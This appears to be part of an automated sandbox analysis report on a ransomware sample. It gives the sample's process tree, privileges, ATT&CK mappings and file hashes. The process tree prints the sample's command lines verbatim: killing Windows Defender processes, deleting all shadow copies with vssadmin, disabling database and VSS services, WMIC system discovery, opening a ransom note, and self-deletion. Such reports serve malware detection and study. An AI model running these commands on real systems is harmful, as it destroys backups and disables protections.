Token: SeIncreaseQuotaPrivilege	64	WMIC.exe
Token: SeSecurityPrivilege	64	WMIC.exe
Token: SeTakeOwnershipPrivilege	64	WMIC.exe
Token: SeLoadDriverPrivilege	64	WMIC.exe
Token: SeSystemProfilePrivilege	64	WMIC.exe
Token: SeSystemtimePrivilege	64	WMIC.exe
Token: SeProfSingleProcessPrivilege	64	WMIC.exe
Token: SeIncBasePriorityPrivilege	64	WMIC.exe
Token: SeCreatePagefilePrivilege	64	WMIC.exe
Token: SeBackupPrivilege	64	WMIC.exe
Token: SeRestorePrivilege	64	WMIC.exe
Token: SeShutdownPrivilege	64	WMIC.exe
Token: SeDebugPrivilege	64	WMIC.exe
Token: SeSystemEnvironmentPrivilege	64	WMIC.exe
Token: SeRemoteShutdownPrivilege	64	WMIC.exe
Token: SeUndockPrivilege	64	WMIC.exe
Token: SeManageVolumePrivilege	64	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3752 wrote to memory of 2784	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2784	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2784	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 2784 wrote to memory of 2972	2784	cmd.exe	taskkill.exe
PID 2784 wrote to memory of 2972	2784	cmd.exe	taskkill.exe
PID 2784 wrote to memory of 2972	2784	cmd.exe	taskkill.exe
PID 3752 wrote to memory of 3424	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3424	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3424	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2392	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2392	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2392	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 2392 wrote to memory of 308	2392	cmd.exe	WMIC.exe
PID 2392 wrote to memory of 308	2392	cmd.exe	WMIC.exe
PID 2392 wrote to memory of 308	2392	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 4732	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 4732	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 4732	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 5024	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 5024	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 5024	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 5024 wrote to memory of 64	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 64	5024	cmd.exe	WMIC.exe
PID 5024 wrote to memory of 64	5024	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 3904	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3904	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 3904	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1964	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1964	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1964	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 1964 wrote to memory of 4764	1964	cmd.exe	WMIC.exe
PID 1964 wrote to memory of 4764	1964	cmd.exe	WMIC.exe
PID 1964 wrote to memory of 4764	1964	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 2072	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2072	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2072	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 4940	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 4940	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 4940	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 4940 wrote to memory of 824	4940	cmd.exe	WMIC.exe
PID 4940 wrote to memory of 824	4940	cmd.exe	WMIC.exe
PID 4940 wrote to memory of 824	4940	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 1256	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1256	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1256	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2736	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2736	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 2736	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 2736 wrote to memory of 3684	2736	cmd.exe	WMIC.exe
PID 2736 wrote to memory of 3684	2736	cmd.exe	WMIC.exe
PID 2736 wrote to memory of 3684	2736	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 1160	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1160	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1160	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 3752 wrote to memory of 1796	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe
PID 1796 wrote to memory of 1476	1796	cmd.exe	WMIC.exe
PID 1796 wrote to memory of 1476	1796	cmd.exe	WMIC.exe
PID 1796 wrote to memory of 1476	1796	cmd.exe	WMIC.exe
PID 3752 wrote to memory of 4856	3752	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
"C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies extensions of user files
- Windows security modification
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM MSASCuiL.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
  2⤵
  PID:3424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo OS INFO: > %TEMP%\SPARKQFOX"
  2⤵
  PID:3796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic OS get Caption,CSDVersion,OSArchitecture,Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo BIOS INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:4732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5024
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo CPU INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
    3⤵
    PID:4764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:2072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMPHYSICAL get MaxCapacity
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\SPARKQFOX"
  2⤵
  PID:1256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
    3⤵
    PID:3684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo NIC INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:1160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\SPARKQFOX"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic NIC get Description, MACAddress, NetEnabled, Speed
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DISKDRIVE INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:4856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\SPARKQFOX"
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic DISKDRIVE get InterfaceType, Name, Size, Status
    3⤵
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo USERACCOUNT INFO: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\SPARKQFOX"
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
    3⤵
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo IPCONFIG: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:2284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "ipconfig >> %TEMP%\SPARKQFOX"
  2⤵
  PID:2364
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DATABASES FILES: >> %TEMP%\SPARKQFOX"
  2⤵
  PID:3128
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe"
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 3000
    3⤵
    - Runs ping.exe
    PID:2612

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
11B

MD5
887ae0db192785398c154a027c858317

SHA1
9e1258a3444e7f54d4a2b23bec0c020d67f285b6

SHA256
9841fc54844c86d073907913cfd2fccc49d13db491e790c6aeb30b7159e62bf5

SHA512
65364e8797ecc23d9eac18cfe0c1393e9429ee15cde33b7b936c917608196da7bf53ba7c21d9bb637c9a91797eb58a4dbb2346dc4bd9e6c947a711b381dfcb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
296B

MD5
e771e08346c6a2bc73c2a372cba333d8

SHA1
58a23e4ce4c758212d9cef74045c31dba35d4923

SHA256
12846bff5586d9a89874c612d9269e2ba1e5a730438373ce9a08919b58a0df6f

SHA512
0611c1d8f71ef330812f72ce0d7416253caf3a5feab48545dcd26f4b242949fd7f7fc58da069bec8bc2600c52d8df6d9b43012a429b1d96a88749951dd461c15

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
296B

MD5
e771e08346c6a2bc73c2a372cba333d8

SHA1
58a23e4ce4c758212d9cef74045c31dba35d4923

SHA256
12846bff5586d9a89874c612d9269e2ba1e5a730438373ce9a08919b58a0df6f

SHA512
0611c1d8f71ef330812f72ce0d7416253caf3a5feab48545dcd26f4b242949fd7f7fc58da069bec8bc2600c52d8df6d9b43012a429b1d96a88749951dd461c15

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
668B

MD5
fc4dd1d0772fb154de31953c2b421a26

SHA1
f8273a9f46597ef98632d8082a24210c5b0d1158

SHA256
17e67d6439097c6b6cb5105e6661d18678921cc5ae4d03f31d1ed950df738b1b

SHA512
605cd1b8d10b64e3ad0388e753c658bc0ee6a3c6262952705b9516f9df3a59b50aac01fe0d0da7193aa16d12dfcff3126a71485414818593a2d6fbed1edd162f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
668B

MD5
fc4dd1d0772fb154de31953c2b421a26

SHA1
f8273a9f46597ef98632d8082a24210c5b0d1158

SHA256
17e67d6439097c6b6cb5105e6661d18678921cc5ae4d03f31d1ed950df738b1b

SHA512
605cd1b8d10b64e3ad0388e753c658bc0ee6a3c6262952705b9516f9df3a59b50aac01fe0d0da7193aa16d12dfcff3126a71485414818593a2d6fbed1edd162f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
c71e901a4f65c7a50a11a3b836622873

SHA1
162f9bfcc801e7db8da1eb8ce42b21b1f50a09e9

SHA256
f33353dd1816be2913e1950ddc935aa9e70010a15abdbf7d1001a55edc82e52a

SHA512
b0de60436bea2d756e350b44be69252fd744f435a5b7e119452230eaf57a7ff339071be29eaa4b501eb01bf227bde590c36ef17683e090ddad745ceb4c4ed681

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
c71e901a4f65c7a50a11a3b836622873

SHA1
162f9bfcc801e7db8da1eb8ce42b21b1f50a09e9

SHA256
f33353dd1816be2913e1950ddc935aa9e70010a15abdbf7d1001a55edc82e52a

SHA512
b0de60436bea2d756e350b44be69252fd744f435a5b7e119452230eaf57a7ff339071be29eaa4b501eb01bf227bde590c36ef17683e090ddad745ceb4c4ed681

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
69844fa8296e4e4e2b29f921141ae838

SHA1
e161644d7ba0c4ffc86be06abf77ff390ec85676

SHA256
53031d7b21762222ab98e3f9ef68b2fa902ddcb0bc4d4c0dbbe8bfbb09e0dc96

SHA512
bda825eceb2c58081b192058199ef67c60e4177ae36ba69b0ead3e77b2e6d96d2444638989bd975947c78741a04f94a220c1a5cce4b32fb57685d27cf5b93396

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
f4b09ff7e0b9d684242f02f3bfc973d2

SHA1
06572016df2cc5f83e1e29f28ca08ccd6adbcf31

SHA256
3a72d27644968b8c776cb9f865570eb038415fabb1acba749a88f39c5ca5a86c

SHA512
e02ddc00772434e25e98387afe56a5ec45d89ad98ee9dd204ca9d67458ec9f00bf5840b09bcdee090e507360f699903e402bb4c585c205eaa57dc67418ee3229

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
65c1247c68ad9d85a3b2d66beb9cea42

SHA1
71d429cf2722b43109a8823d06633c46e52c2a54

SHA256
9f08c7a43c50b013aff9ae8d8ad86520d55ddb4ac61b63b08380101ece9b00fb

SHA512
bfb9877a702b7cd7d53bf1d2ca5ddef36052048c6b832e00298cd32d259cfda8ccd2662d7e449a55334e738009b820a71fc955f758baf055f521aab527f7b658

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
65c1247c68ad9d85a3b2d66beb9cea42

SHA1
71d429cf2722b43109a8823d06633c46e52c2a54

SHA256
9f08c7a43c50b013aff9ae8d8ad86520d55ddb4ac61b63b08380101ece9b00fb

SHA512
bfb9877a702b7cd7d53bf1d2ca5ddef36052048c6b832e00298cd32d259cfda8ccd2662d7e449a55334e738009b820a71fc955f758baf055f521aab527f7b658

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
61aaad84a61a4273eb5dd9f473ca43c3

SHA1
9b132cd5a2976c386f6f7f31a202d233bd76c09e

SHA256
de58897f904177391dd645f0e9f94a9f14121defe2188ce68197e315b23e466b

SHA512
e1e531388985a1dd89f4c47c41b05e2d5d7f4e77f4fd071b109fa2d641a56f3e529b1157380f990ca9160cd2df065b2c214b5f8d5e27ca9dc7529debdd4b5e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
1KB

MD5
61aaad84a61a4273eb5dd9f473ca43c3

SHA1
9b132cd5a2976c386f6f7f31a202d233bd76c09e

SHA256
de58897f904177391dd645f0e9f94a9f14121defe2188ce68197e315b23e466b

SHA512
e1e531388985a1dd89f4c47c41b05e2d5d7f4e77f4fd071b109fa2d641a56f3e529b1157380f990ca9160cd2df065b2c214b5f8d5e27ca9dc7529debdd4b5e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
2KB

MD5
f2e63005e01dbdbf16b39de5f842ceda

SHA1
152211c3b9d03eb21228423a74bfd9ecb07ad325

SHA256
f3584d7109dc4314c7a95c713ecbfc58eda48d9acd822ea0dbf038f2bdfc7b9a

SHA512
13dc583877b3c44ac8e97ffd1b19897e79e820742e6a536ef3172707739bb8d35948c348862a96976f611b3f4cfe97314fb038900c9a91701441a2d5ef79f40d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
2KB

MD5
f2e63005e01dbdbf16b39de5f842ceda

SHA1
152211c3b9d03eb21228423a74bfd9ecb07ad325

SHA256
f3584d7109dc4314c7a95c713ecbfc58eda48d9acd822ea0dbf038f2bdfc7b9a

SHA512
13dc583877b3c44ac8e97ffd1b19897e79e820742e6a536ef3172707739bb8d35948c348862a96976f611b3f4cfe97314fb038900c9a91701441a2d5ef79f40d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
3KB

MD5
eb2587ca3f56d4e43c4ccb49f49fb10e

SHA1
85e3586a7c68eacad6c8590ea2ab30dc318a51be

SHA256
671f351a5b5e0949fb57515e9a77bd37c055ef6a73f715458832e8dd2a2e8092

SHA512
f9adcd6f1c8d335d262afb8b9a4c3365a66006ae612089610163421e745bb6a88373f46cd85acabeb66eec895e4b2155551c9ca9afdf9de49a8c284a3ef2a9c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
3KB

MD5
eb2587ca3f56d4e43c4ccb49f49fb10e

SHA1
85e3586a7c68eacad6c8590ea2ab30dc318a51be

SHA256
671f351a5b5e0949fb57515e9a77bd37c055ef6a73f715458832e8dd2a2e8092

SHA512
f9adcd6f1c8d335d262afb8b9a4c3365a66006ae612089610163421e745bb6a88373f46cd85acabeb66eec895e4b2155551c9ca9afdf9de49a8c284a3ef2a9c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\SPARKQFOX

Filesize
3KB

MD5
8322f9e0dea3c7c63e26672ed6d29e5c

SHA1
c23a8a2ef427f2612c5cbfe0ed24d2e637ced0ea

SHA256
be48004a4c90816058abbdce513bb2e2bc9823bc22945793082198cfe0c2faa6

SHA512
8744a0e6822533742667334952b9e35825649569af36d2408ea73b70ef51407ae8c769404c01e47e06ac4759b8382b543f1705b35af0def5ca2b3fab460e3238

Download Submit
C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_UVFRM.txt

Filesize
11KB

MD5
4d948087a124859cb689d6a6742eec84

SHA1
fda80f30439f7a40a178f8d96db38b765f506ec2

SHA256
251f9cd6baf3718dbdce1f5dc9cf1af5b95a9a45521666e4078de3651b1747d2

SHA512
01a30570b14f9a6fc9505d77844d5297e65a606782ed32f58af89eff6c731e941d949ba8eb0928fb0a4023ad554a98382c27727d1f5b8f0e19002a59a46c8027

Download Submit
memory/64-144-0x0000000000000000-mapping.dmp

Download
memory/308-139-0x0000000000000000-mapping.dmp

Download
memory/824-154-0x0000000000000000-mapping.dmp

Download
memory/1104-170-0x0000000000000000-mapping.dmp

Download
memory/1160-160-0x0000000000000000-mapping.dmp

Download
memory/1256-155-0x0000000000000000-mapping.dmp

Download
memory/1476-164-0x0000000000000000-mapping.dmp

Download
memory/1796-162-0x0000000000000000-mapping.dmp

Download
memory/1928-184-0x0000000000000000-mapping.dmp

Download
memory/1960-172-0x0000000000000000-mapping.dmp

Download
memory/1964-147-0x0000000000000000-mapping.dmp

Download
memory/1988-179-0x0000000000000000-mapping.dmp

Download
memory/2072-150-0x0000000000000000-mapping.dmp

Download
memory/2080-169-0x0000000000000000-mapping.dmp

Download
memory/2284-175-0x0000000000000000-mapping.dmp

Download
memory/2364-177-0x0000000000000000-mapping.dmp

Download
memory/2392-137-0x0000000000000000-mapping.dmp

Download
memory/2612-185-0x0000000000000000-mapping.dmp

Download
memory/2736-157-0x0000000000000000-mapping.dmp

Download
memory/2784-132-0x0000000000000000-mapping.dmp

Download
memory/2972-133-0x0000000000000000-mapping.dmp

Download
memory/3028-167-0x0000000000000000-mapping.dmp

Download
memory/3128-180-0x0000000000000000-mapping.dmp

Download
memory/3424-134-0x0000000000000000-mapping.dmp

Download
memory/3584-183-0x0000000000000000-mapping.dmp

Download
memory/3684-159-0x0000000000000000-mapping.dmp

Download
memory/3752-182-0x0000000000F30000-0x0000000001FA5000-memory.dmp

Filesize
16.5MB

Download
memory/3752-186-0x0000000000F30000-0x0000000001FA5000-memory.dmp

Filesize
16.5MB

Download
memory/3752-135-0x0000000000F30000-0x0000000001FA5000-memory.dmp

Filesize
16.5MB

Download
memory/3796-136-0x0000000000000000-mapping.dmp

Download
memory/3904-145-0x0000000000000000-mapping.dmp

Download
memory/4104-174-0x0000000000000000-mapping.dmp

Download
memory/4732-140-0x0000000000000000-mapping.dmp

Download
memory/4764-149-0x0000000000000000-mapping.dmp

Download
memory/4856-165-0x0000000000000000-mapping.dmp

Download
memory/4940-152-0x0000000000000000-mapping.dmp

Download
memory/5024-142-0x0000000000000000-mapping.dmp

Download